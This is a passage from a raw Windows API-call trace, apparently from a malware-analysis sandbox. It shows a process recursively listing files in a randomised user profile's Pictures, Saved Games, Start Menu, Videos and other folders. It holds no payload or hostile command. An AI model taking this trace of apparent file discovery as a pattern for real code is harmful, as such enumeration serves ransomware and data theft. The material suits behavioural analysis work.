cAlternateFileName="AVDSIE~1")) returned 1 [0184.489] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.489] lstrlenW (lpString="AvdSIE15bDl1Nh") returned 14 [0184.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\*", lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49164e00, ftCreationTime.dwHighDateTime=0x1d5dfb9, ftLastAccessTime.dwLowDateTime=0xa11c1670, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0xa11c1670, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.490] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49164e00, ftCreationTime.dwHighDateTime=0x1d5dfb9, ftLastAccessTime.dwLowDateTime=0xa11c1670, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0xa11c1670, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="..", cAlternateFileName="")) returned 1 [0184.490] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.490] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7071e40, ftCreationTime.dwHighDateTime=0x1d5e32e, ftLastAccessTime.dwLowDateTime=0x5bedca40, ftLastAccessTime.dwHighDateTime=0x1d5daf9, ftLastWriteTime.dwLowDateTime=0x5bedca40, ftLastWriteTime.dwHighDateTime=0x1d5daf9, nFileSizeHigh=0x0, nFileSizeLow=0x162f6, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="FAeC.gif", cAlternateFileName="")) returned 1 [0184.490] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.490] lstrlenW (lpString="FAeC.gif") returned 8 [0184.490] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AvdSIE15bDl1Nh\\JgTiYn1dVGVn23M9E0UL\\*", lpFindFileData=0x6e8248 | out: lpFindFileData=0x6e8248*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcae522f0, ftCreationTime.dwHighDateTime=0x1d5e354, ftLastAccessTime.dwLowDateTime=0x459ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x459ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x8a4af3c0, cFileName=".", cAlternateFileName="")) returned 0x6ebda0 [0184.490] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6e8248 | out: lpFindFileData=0x6e8248*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcae522f0, ftCreationTime.dwHighDateTime=0x1d5e354, ftLastAccessTime.dwLowDateTime=0x459ddfa0, ftLastAccessTime.dwHighDateTime=0x1d5df36, ftLastWriteTime.dwLowDateTime=0x459ddfa0, ftLastWriteTime.dwHighDateTime=0x1d5df36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e82a, dwReserved1=0x8a4af3c0, cFileName="..", cAlternateFileName="")) returned 1 [0184.491] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.491] FindNextFileW (in: hFindFile=0x6ebda0, lpFindFileData=0x6e8248 | out: lpFindFileData=0x6e8248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2783820, ftCreationTime.dwHighDateTime=0x1d5dd46, ftLastAccessTime.dwLowDateTime=0xd48d02e0, ftLastAccessTime.dwHighDateTime=0x1d5dc16, ftLastWriteTime.dwLowDateTime=0xd48d02e0, ftLastWriteTime.dwHighDateTime=0x1d5dc16, nFileSizeHigh=0x0, nFileSizeLow=0x153b6, dwReserved0=0x1d5e82a, dwReserved1=0x8a4af3c0, cFileName="FXZFgJe.png", cAlternateFileName="")) returned 1 [0184.491] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.491] lstrlenW (lpString="FXZFgJe.png") returned 11 [0184.491] FindClose (in: hFindFile=0x6ebda0 | out: hFindFile=0x6ebda0) returned 1 [0184.491] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8248 | out: hHeap=0x6b0000) returned 1 [0184.491] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1700dd20, ftCreationTime.dwHighDateTime=0x1d5dc73, ftLastAccessTime.dwLowDateTime=0x11ad5e60, ftLastAccessTime.dwHighDateTime=0x1d5df2b, ftLastWriteTime.dwLowDateTime=0x11ad5e60, ftLastWriteTime.dwHighDateTime=0x1d5df2b, nFileSizeHigh=0x0, nFileSizeLow=0x7b01, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="PfJawLNFFwT mUf.bmp", cAlternateFileName="PFJAWL~1.BMP")) returned 1 [0184.491] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.491] lstrlenW (lpString="PfJawLNFFwT mUf.bmp") returned 19 [0184.491] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.491] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6b0000) returned 1 [0184.491] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7131e40, ftCreationTime.dwHighDateTime=0x1d5e575, ftLastAccessTime.dwLowDateTime=0xf9194040, ftLastAccessTime.dwHighDateTime=0x1d5d8cb, ftLastWriteTime.dwLowDateTime=0xf9194040, ftLastWriteTime.dwHighDateTime=0x1d5d8cb, nFileSizeHigh=0x0, nFileSizeLow=0x12435, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="BqvISbJs1.jpg", cAlternateFileName="BQVISB~1.JPG")) returned 1 [0184.491] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.492] lstrlenW (lpString="BqvISbJs1.jpg") returned 13 [0184.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\*", lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67eb3260, ftCreationTime.dwHighDateTime=0x1d5df81, ftLastAccessTime.dwLowDateTime=0x86f66e30, ftLastAccessTime.dwHighDateTime=0x1d5df37, ftLastWriteTime.dwLowDateTime=0x86f66e30, ftLastWriteTime.dwHighDateTime=0x1d5df37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.492] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67eb3260, ftCreationTime.dwHighDateTime=0x1d5df81, ftLastAccessTime.dwLowDateTime=0x86f66e30, ftLastAccessTime.dwHighDateTime=0x1d5df37, ftLastWriteTime.dwLowDateTime=0x86f66e30, ftLastWriteTime.dwHighDateTime=0x1d5df37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="..", cAlternateFileName="")) returned 1 [0184.492] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.492] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e44a290, ftCreationTime.dwHighDateTime=0x1d5dbf7, ftLastAccessTime.dwLowDateTime=0x24342450, ftLastAccessTime.dwHighDateTime=0x1d5e729, ftLastWriteTime.dwLowDateTime=0x24342450, ftLastWriteTime.dwHighDateTime=0x1d5e729, nFileSizeHigh=0x0, nFileSizeLow=0xd34b, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="03TGpg1kbZwgPyZMP0.jpg", cAlternateFileName="03TGPG~1.JPG")) returned 1 [0184.492] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.492] lstrlenW (lpString="03TGpg1kbZwgPyZMP0.jpg") returned 22 [0184.492] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.492] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6b0000) returned 1 [0184.492] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b77840, ftCreationTime.dwHighDateTime=0x1d5e6cc, ftLastAccessTime.dwLowDateTime=0x61784a30, ftLastAccessTime.dwHighDateTime=0x1d5db44, ftLastWriteTime.dwLowDateTime=0x61784a30, ftLastWriteTime.dwHighDateTime=0x1d5db44, nFileSizeHigh=0x0, nFileSizeLow=0xc17e, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="dvvAeBv.gif", cAlternateFileName="")) returned 1 [0184.493] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.493] lstrlenW (lpString="dvvAeBv.gif") returned 11 [0184.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\*", lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b124900, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x743a2b00, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x743a2b00, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.493] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b124900, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x743a2b00, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x743a2b00, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="..", cAlternateFileName="")) returned 1 [0184.493] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.493] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x6e7d38 | out: lpFindFileData=0x6e7d38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c5facb0, ftCreationTime.dwHighDateTime=0x1d5e425, ftLastAccessTime.dwLowDateTime=0x7a6157e0, ftLastAccessTime.dwHighDateTime=0x1d5d918, ftLastWriteTime.dwLowDateTime=0x7a6157e0, ftLastWriteTime.dwHighDateTime=0x1d5d918, nFileSizeHigh=0x0, nFileSizeLow=0x17d9b, dwReserved0=0x54004c, dwReserved1=0x6b004f, cFileName="5FmG.png", cAlternateFileName="")) returned 1 [0184.493] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.493] lstrlenW (lpString="5FmG.png") returned 8 [0184.493] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.493] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6b0000) returned 1 [0184.493] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b124900, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x743a2b00, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x743a2b00, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="VvYGyUs", cAlternateFileName="")) returned 0 [0184.493] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.494] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.494] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0184.494] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.494] lstrlenW (lpString="PrintHood") returned 9 [0184.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x703f50, ftCreationTime.dwLowDateTime=0x6fcc98, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x743a2b00, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x743a2b00, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="VvYGyUs", cAlternateFileName="")) returned 0xffffffff [0184.494] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.494] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0184.494] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.494] lstrlenW (lpString="Recent") returned 6 [0184.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x703f50, ftCreationTime.dwLowDateTime=0x6fcc98, ftCreationTime.dwHighDateTime=0x1d5de2e, ftLastAccessTime.dwLowDateTime=0x743a2b00, ftLastAccessTime.dwHighDateTime=0x1d5e19a, ftLastWriteTime.dwLowDateTime=0x743a2b00, ftLastWriteTime.dwHighDateTime=0x1d5e19a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="VvYGyUs", cAlternateFileName="")) returned 0xffffffff [0184.494] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.494] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0184.494] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.495] lstrlenW (lpString="Saved Games") returned 11 [0184.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.517] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.517] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.517] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x1d2dd9c, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.517] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.517] lstrlenW (lpString="desktop.ini") returned 11 [0184.517] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.518] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.518] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0184.518] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.518] lstrlenW (lpString="Searches") returned 8 [0184.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.518] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0184.518] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.518] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.518] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.518] lstrlenW (lpString="desktop.ini") returned 11 [0184.518] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.518] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.518] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0184.519] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.519] lstrlenW (lpString="SendTo") returned 6 [0184.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x6e7ae0, ftCreationTime.dwLowDateTime=0x708040, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.519] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.519] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0184.519] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.519] lstrlenW (lpString="Start Menu") returned 10 [0184.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x6e7ae0, ftCreationTime.dwLowDateTime=0x708040, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.519] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.519] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0184.519] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.519] lstrlenW (lpString="Templates") returned 9 [0184.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x6e7ae0, ftCreationTime.dwLowDateTime=0x708040, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0184.520] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb780 | out: hHeap=0x6b0000) returned 1 [0184.520] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdaf98de0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdaf98de0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0184.520] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.520] lstrlenW (lpString="Videos") returned 6 [0184.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x6eb780 | out: lpFindFileData=0x6eb780*(dwFileAttributes=0x11, 